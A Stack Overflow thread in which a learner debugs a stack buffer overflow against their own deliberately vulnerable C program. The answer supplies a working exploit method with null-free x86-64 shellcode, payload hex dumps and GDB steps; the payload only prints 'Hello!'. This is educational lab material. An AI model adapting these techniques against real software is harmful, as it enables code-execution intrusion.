Unable to inject shellcode in vulnerable program

Question

I am studying the stack-based buffer overflow vulnerability. I would like to inject the following shellcode I wrote:

BITS 64

jmp short one

two:
    pop rcx
    xor rax,rax
    mov al, 4
    xor rbx, rbx
    inc rbx
    xor rdx, rdx
    mov dl, 15
    int 0x80

    mov al, 1
    dec rbx
    int 0x80

one:
    call two
    db "Hello, Friend.\n", 0x0a

I disabled ASLR (echo 0 > /proc/sys/kernel/randomize_va_space) and compiled the program using -fno-stack-protector -z execstack, but still when I run the command:

root@computer# ./simple $(python3 -c 'print("A" * 64 + "\x6b\xe7\xff\xff\xff\x7f")')

this is what I get:

Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkçÿÿÿ
Segmentation fault

The offset (64) is calculated in gdb (the distance between the variable buffer and rbp). The address in the command is the little-endian form of 0x7fffffffe76b, the address of the environment variable that holds the shellcode. I also hexdumped the injected program, making sure no null bytes were present:

00000000  eb 1a 59 48 31 c0 b0 04  48 31 db 48 ff c3 48 31  |..YH1...H1.H..H1|
00000010  d2 b2 0f cd 80 b0 01 48  ff cb cd 80 e8 e1 ff ff  |.......H........|
00000020  ff 48 65 6c 6c 6f 2c 20  46 72 69 65 6e 64 2e 5c  |.Hello, Friend.\|
00000030  6e 0a                                             |n.|
00000032

The address was calculated using:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){
    int pl = strlen(*argv);
    char *addr = getenv(*++argv);
    addr += (pl - strlen(*++argv))*2;
    printf("\n%s @ %p\n\n", *--argv, addr);
}

It is a modified version of the program in Jon Erickson's book.

This is the program with the vulnerability:

//simple.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void hidden(void){
    printf("Welcome to the dark side, young padawan");
    exit(0);
}

void welcome(char *s){
    char buffer[50];
    //int placeholder = 13;
    strcpy(buffer, "Welcome ");
    strcat(buffer, s);
    printf("%s\n", buffer);
}

int main(int argc, char **argv){
    if(--argc < 1){
        printf("\nUsage: %s [NAME]\n\n", *argv);
        exit(1);
    }
    welcome(*++argv);
}

Lastly, I dug in using GDB, and I found a strange thing, which I don't know how to avoid (or fix):

(gdb) p $rbp - $rsp
$1 = 80
(gdb) x/48x $rsp-80
0x7fffffffdd90: 0x00000000  0x00000000  0x00000000  0x00000000
0x7fffffffdda0: 0x00000000  0x00000000  0x00000000  0x00000000
0x7fffffffddb0: 0x00000000  0x00000000  0x00000000  0x00000000
0x7fffffffddc0: 0x00000000  0x00000000  0xf7ffe180  0x00007fff
0x7fffffffddd0: 0x00000002  0x00000000  0x555551bf  0x00005555
0x7fffffffdde0: 0x00000000  0x00000000  0xffffe2cf  0x00007fff
0x7fffffffddf0: 0x636c6557  0x20656d6f  0x41414141  0x41414141
0x7fffffffde00: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffde10: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffde20: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffde30: 0x41414141  0x41414141  0xafc394c2  0xc335b8c3
0x7fffffffde40: 0xff007fbc  0x00007fff  0x00000000  0x00000001
(gdb) c
Continuing.
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAïø5ü

Program received signal SIGSEGV, Segmentation fault.
0x00005555555551cd in welcome (s=0x7fffffffe2cf 'A' <repeats 64 times>, "\302\224ïø5ü\177") at simple.c:16
16  }

After the padding (0x41), the return address is ruined due to the double byte representation of \xff.

Can someone help me understand why I am not able to inject the shellcode?

Weird, you had "\x6b\xe7\xff\xff\xff\x7f" but I don't see 6B or E7 in your stack dump anywhere. — puppydrum64, Dec 22 '22 at 17:16
Also it's unclear how your address calculation is supposed to work. What you should do instead is look at the disassembly of `welcome` in the actual program so you can determine the offset. — Jester, Dec 22 '22 at 17:30
@puppydrum64 Exactly. Instead of `\xff` I have `\xbc\xc3`. Any idea why? Solving this might make me able to finally inject the code — KmerPadreDiPdor, Dec 22 '22 at 18:35
@Jester Could you please make yourself clearer? The problem is not the function `welcome()`. The offset is correct, I tested it already changing the flow of the program (executing `hidden()`, which is not in main). The problem is why the return address gets ruined hence cannot inject correctly the shellcode. Thanks anyway — KmerPadreDiPdor, Dec 22 '22 at 18:39
Put a breakpoint on `main` and verify your payload gets there properly. — Jester, Dec 22 '22 at 18:51
@Jester Apologies, but I still don't get it. If I set a breakpoint on main, then to examine the payload I have to step into `welcome()`, which I did (in the question), and I always get the same result: the shellcode is in the env-var, I inject the address of the env-var, and the RIP exception (not a valid address -> SIGSEGV) is raised... I just want to understand why the return address gets messed up during the injection, because I suppose this is the reason I am having all these difficulties. Nevertheless, thanks again for trying to help. — KmerPadreDiPdor, Dec 22 '22 at 20:31
1. There are no env vars in the program 2. According to gdb your shellcode is not what you showed which is why you should check that it gets into `main` to start with. — Jester, Dec 22 '22 at 21:03
Even if you did inject this code, stack addresses will be outside the low 32 bits, so `int 0x80` will return `-EFAULT` instead of printing because ECX, the low 32 bits of RCX, isn't a valid address. [What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code?](https://stackoverflow.com/q/46087730) — Peter Cordes, Dec 22 '22 at 21:50
@ Peter Cordes Any suggestion on how to solve this problem and inject the code? — KmerPadreDiPdor, Dec 23 '22 at 17:16

score 4 · Answer 1 · edited Dec 23 '22 at 22:33

First of all, use 64-bit code when exploiting a 64-bit executable. int 0x80 is the old 32-bit syscall interface.

Second, you can pass the shellcode in the buffer itself, making it act as both the shellcode and padding. See below if you still want to use an environment variable.

Passing the shellcode in the buffer

I won't disable ASLR globally and instead rely on GDB setting the appropriate personality of the debugged process to individually disable ASLR.
Since the process reads the string from the command line, this gets a bit tricky: the command line arguments shift the stack pointer down at the program entry point (the bigger they are, the lower the stack pointer will be), because Linux saves environment variables and command line arguments above the stack.
This will change the actual address where the shellcode will be loaded.

So you first need to know how big the shellcode will be, and for that you also need to know how much data is needed to overwrite the return address. You can find this out by inspecting the disassembly of welcome.
For a function as simple as this one, objdump will suffice:

000000000000118b <welcome>:
    118b:   55                      push   %rbp
    118c:   48 89 e5                mov    %rsp,%rbp
    118f:   48 83 ec 50             sub    $0x50,%rsp
    1193:   48 89 7d b8             mov    %rdi,-0x48(%rbp)    ;message

    1197:   48 8d 45 c0             lea    -0x40(%rbp),%rax    ;buffer
    119b:   48 b9 57 65 6c 63 6f    movabs $0x20656d6f636c6557,%rcx    ;"Welcome "
    11a2:   6d 65 20 
    11a5:   48 89 08                mov    %rcx,(%rax)
    11a8:   c6 40 08 00             movb   $0x0,0x8(%rax)      

    11ac:   48 8b 55 b8             mov    -0x48(%rbp),%rdx    ;message
    11b0:   48 8d 45 c0             lea    -0x40(%rbp),%rax    ;buffer
    11b4:   48 89 d6                mov    %rdx,%rsi
    11b7:   48 89 c7                mov    %rax,%rdi
    11ba:   e8 91 fe ff ff          call   1050 <strcat@plt>   ;<--

    11bf:   48 8d 45 c0             lea    -0x40(%rbp),%rax
    11c3:   48 89 c7                mov    %rax,%rdi
    11c6:   e8 65 fe ff ff          call   1030 <puts@plt>
    11cb:   90                      nop
    11cc:   c9                      leave
    11cd:   c3                      ret

You can see from my comment that the string buffer is at rbp-0x40.
So we need 64 bytes to reach the frame pointer plus 8 bytes to reach the return address plus 8 bytes of the return address itself.
But we start after the string "Welcome ", since this is a strcat, so the total shellcode size is 64 + 8 + 8 - 8 = 72 bytes.
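
The arithmetic above can be checked with a few lines of Python. This is only a sketch of the layout read off the disassembly; the variable names are illustrative and are not symbols from the program.

```python
# Layout taken from the disassembly of welcome (names are illustrative).
BUFFER_OFFSET = 0x40      # buffer lives at rbp-0x40
SAVED_RBP = 8             # saved frame pointer sits at rbp
RETURN_ADDRESS = 8        # return address sits at rbp+8
PREFIX = len("Welcome ")  # strcpy writes this before strcat appends the argument

# Bytes of the argument that land before the return address.
bytes_before_ret = BUFFER_OFFSET + SAVED_RBP - PREFIX
# Total argument size if all 8 bytes of the return address are supplied.
payload_size = bytes_before_ret + RETURN_ADDRESS

print(bytes_before_ret, payload_size)  # 64 72
```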

Create a file with 72 bytes:

> python -c 'print("A"*72, end="")' > shellcode

Now use this file and GDB to find out the address of buffer:

> gdb ./simple -ex 'b welcome' -ex 'r $(cat shellcode)' -ex 'p &buffer'
...
Breakpoint 1, welcome (s=0x7fffffffe78f 'A' <repeats 72 times>) at simple.c:13
13      strcpy(buffer, "Welcome ");
$1 = (char (*)[50]) 0x7fffffffe2d0

We now know that buffer is at 0x7fffffffe2d0, so:

The shellcode will be 8 bytes into buffer, at 0x7fffffffe2d8.
The return address will be 64 bytes into the shellcode (due to the consideration above).
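
As a cross-check, the shellcode address and its in-memory byte order can be computed as follows. This is a sketch that assumes the buffer address printed by GDB in the session above; the value will differ on another machine or with a different argument length.

```python
import struct

BUFFER_ADDR = 0x7FFFFFFFE2D0   # value printed by GDB in the session above
PREFIX = len("Welcome ")       # bytes already in buffer before the argument

shellcode_addr = BUFFER_ADDR + PREFIX
# x86-64 is little-endian, so the least significant byte comes first.
packed = struct.pack("<Q", shellcode_addr)

print(hex(shellcode_addr))     # 0x7fffffffe2d8
print(packed.hex(" "))         # d8 e2 ff ff ff 7f 00 00
```

The two most significant bytes are zero, which is why only six address bytes need to be supplied.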

It's time to write the shellcode and test it. Since we are passing it on the command line, it must not contain new lines either. However, printing a new line is useful to flush the current line to stdout, so I used an ugly hack to create the new line at the end of the string at runtime.
The ugly shellcode is:

BITS 64

;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60

;Constants
%define STDOUT 1
%define MASK 0x01010101


;Emulate a zero-free move of a byte
%macro zfmov 2
    push %2
    pop %1
%endm

;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
    lea %1, [REL %2 + MASK]     ;Add the mask to avoid zeros for small displacements
    sub %1, MASK            ;Remove the mask
%endm

;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
mov BYTE [rsi+message.len-1], 0xaa  ;Make the new line replacing the last char of the string
xor BYTE [rsi+message.len-1], 0xa0  ;Turn 0xaa into 0x0a
zfmov rdx, message.len
syscall

;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall

message db "Hello!A"        ;Last char is replaced with a new line
  .len EQU $-message
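
To see why the two tricks in the listing avoid problematic bytes, here is a small Python sketch. The displacement 0x1B is an assumption read off the hex dump further down in this answer (the `lea` encodes 0x0101011C, which is 0x1B plus MASK); it is not something the assembler reports directly.

```python
import struct

MASK = 0x01010101   # same constant as in the listing
disp = 0x1B         # displacement to message, read off the hex dump (assumption)

plain = struct.pack("<i", disp)          # what a plain lea would encode
masked = struct.pack("<i", disp + MASK)  # what zflea encodes instead

print(plain.hex(" "))    # 1b 00 00 00
print(masked.hex(" "))   # 1c 01 01 01
print(hex(0xAA ^ 0xA0))  # 0xa
```

The first line contains zero bytes, the second does not, and the last line shows how the mov/xor pair produces the 0x0a byte at runtime without it ever appearing in the encoded instructions.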

Now assemble this:

> nasm shellcode.asm -o shellcode

Then pad the file to 64 bytes with any filler and append the return address found above:

0000:0000 | 6A 01 58 6A  01 5F 48 8D  35 1C 01 01  01 48 81 EE | j.Xj._H.5....H.î
0000:0010 | 01 01 01 01  C6 46 06 AA  80 76 06 A0  6A 07 5A 0F | ....ÆF.ª.v. j.Z.
0000:0020 | 05 6A 3C 58  31 FF 0F 05  48 65 6C 6C  6F 21 41 41 | .j<X1ÿ..Hello!AA
0000:0030 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | D8 E2 FF FF  FF 7F 00 00                           | Øâÿÿÿ...

The stack is aligned on 16 bytes, so as long as your shellcode length is between 0x40 and 0x4f (inclusive) the shellcode address won't change.

Finally, run the shellcode:

> gdb ./simple -ex 'r $(cat shellcode)'
...
Welcome jXj_H�5H���F��v�jZj<X1�Hello!AAAAAAAAAAAAAAAAAA�����
Hello!
[Inferior 1 (process 168571) exited normally]

Passing the shellcode in an envar

I assume you read the section above.

The address of the envar depends both on its size and on the size of the command line argument. The command line argument must be at least 64 + 6 bytes long (6 because the last two bytes of the return address are zero, so 6 suffice), and the shellcode can be any size. For the sake of simplicity, we can make both files 70 bytes long.
To be more precise: the address of the envar is sensitive to the size of the shellcode at byte granularity, but it is sensitive to the size of the command line argument only in 16-byte steps (this quantity was once called a paragraph), because the stack is aligned to this size.

Write a 70-byte file with a recognizable pattern, like:

0000:0000 | 43 41 4E 41  52 59 41 41  41 41 41 41  41 41 41 41 | CANARYAAAAAAAAAA
0000:0010 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41  41 41                                 | AAAAAA

Call it pattern. This will simulate the shellcode; it needs a few distinct bytes that we can search for.

Create another 70-byte file with another pattern:

0000:0000 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41  41 41                                 | AAAAAA

Call it placeholder. This will simulate the command line argument.

Find where the envar is with gdb. Remember that we need to pass 70 bytes as the command line argument to simulate the conditions under which the program will be run.
The file placeholder will be used for this purpose, and the file pattern will be used to search for its first bytes in memory.

> SC=$(cat pattern) gdb ./simple -ex 'b main' -ex 'r $(cat placeholder)' -ex 'find /b1 $rsp, +3000, 0x43, 0x41, 0x4e, 0x41' -ex 'p $_'
...
Breakpoint 1, main (argc=2, argv=0x7fffffffe3f8) at simple.c:19
19      if(--argc < 1){
0x7fffffffec1f
1 pattern found.
$1 = (void *) 0x7fffffffec1f

Now edit placeholder and put the address found in its last 6 bytes:

0000:0000 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 1F EC FF FF  FF 7F                                 | .ìÿÿÿ.

This is the final value of the command line argument.

Finally, make the shellcode. It's pretty much the same but now we can use bytes of value 0x0a and I padded it to 70 bytes:

BITS 64

;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60

;Constants
%define STDOUT 1
%define MASK 0x01010101


;Emulate a zero-free move of a byte
%macro zfmov 2
    push %2
    pop %1
%endm

;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
    lea %1, [REL %2 + MASK]     ;Add the mask to avoid zeros for small displacements
    sub %1, MASK            ;Remove the mask
%endm

;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
zfmov rdx, message.len
syscall

;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall

message db "Hello!", 0x0a       ;A literal new line is fine inside an envar
  .len EQU $-message
  
TIMES 70 -($-$$) db 'A'

Assemble it:

> nasm shellcode.asm -o shellcode

We can now run it:

> SC=$(cat shellcode)  gdb ./simple -ex 'r $(cat placeholder)'
...
Welcome CANARYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Hello!
[Inferior 1 (process 170902) exited normally]

How does it work?

Our strategy has been to use GDB to replicate the runtime conditions under which the program will be exploited.
In the first section we are interested in finding the address of buffer. We realized that this depends on the size of the command line arguments, so we first found out the shellcode size by statically analyzing the program and then found the address of buffer using a fake shellcode.
The exploitation itself is pretty basic: the stack is executable and the return address is simply overwritten to steer the execution.

In the second section, we are interested in finding the address of an envar value that the kernel places above the stack.
We proceed in the same manner: we use a fake command line argument, a fake shellcode with a recognizable pattern, and GDB to find the address of the envar value.
This time we must be more careful about the exact size, at least for the shellcode itself.
The exploitation is similar to the previous one, but the shellcode is inside an envar (which allows for newlines and whatnot).

The second method (the one I am interested in) is not working. Fine until the 'finding the pattern', which I changed a bit (ABC + A * 67). Then when I modified `placeholder` with `python -c 'print("A" * 64 + "\xbf\xed\xff\xff\xff\x7f")' > placeholder` the last line was `00000040 c2 bf c3 ad c3 bf c3 bf c3 bf 7f 0a |............|`: same problem as happened so far with my method. So, produced the shellcode with `nasm`, I used gdb still and got `Program received signal SIGSEGV, Segmentation fault. 0x00005555555551c6 in welcome (s=0x7fffffffe2b5 'A' , "¿íÿÿÿ\177") — KmerPadreDiPdor, Dec 24 '22 at 13:52
Sorry for the bad format, I had not that much space to explain myself. Anyway , to make it clear, the address in the python command is the one found using pattern, and the "last line" above, is the last line of `hexdump -C placeholder`. I still do not understand why `\xff` is represented as `\xbf\xc3` hence with two bytes, because is this the real problem why the shellcode does not get injected, even with my method... — KmerPadreDiPdor, Dec 24 '22 at 13:54
@KmerPadreDiPdor Python 3 uses Unicode strings (which are what `print` prints) and UTF-8 as the default encoding. `0xc3 0xbf` are the UTF-8 code units of `\u00ff`. Use `bytes` and write directly to stdout with `sys.stdout.buffer.write`. Or just use a hex editor. Also, `print` adds a new line, which will mess up the second method. — Margaret Bloom, Dec 24 '22 at 16:59
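
The encoding issue described in this last comment can be reproduced without running the vulnerable program at all. The following sketch compares what `print` emits for the string from the earlier comment with what a `bytes` object contains; the helper name `write_raw` is hypothetical, and the sketch assumes a UTF-8 locale, which is the common default.

```python
import sys

# The str version from the comment above: each character is a code point.
text_payload = "A" * 64 + "\xbf\xed\xff\xff\xff\x7f"
# print() encodes the str (UTF-8 assumed here) and appends a new line.
what_print_emits = (text_payload + "\n").encode("utf-8")

# The bytes version: each element is exactly one byte.
bytes_payload = b"A" * 64 + b"\xbf\xed\xff\xff\xff\x7f"

print(what_print_emits[64:].hex(" "))  # c2 bf c3 ad c3 bf c3 bf c3 bf 7f 0a
print(bytes_payload[64:].hex(" "))     # bf ed ff ff ff 7f


def write_raw(payload: bytes) -> None:
    """Write bytes to stdout unmodified (no encoding, no trailing new line)."""
    sys.stdout.buffer.write(payload)
```

The first line of output matches the last line of the `hexdump -C placeholder` quoted in the comment above, which suggests the file was corrupted by the text encoding rather than by the program. Calling `write_raw(bytes_payload)` and redirecting stdout to a file would produce the intended 70 bytes.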
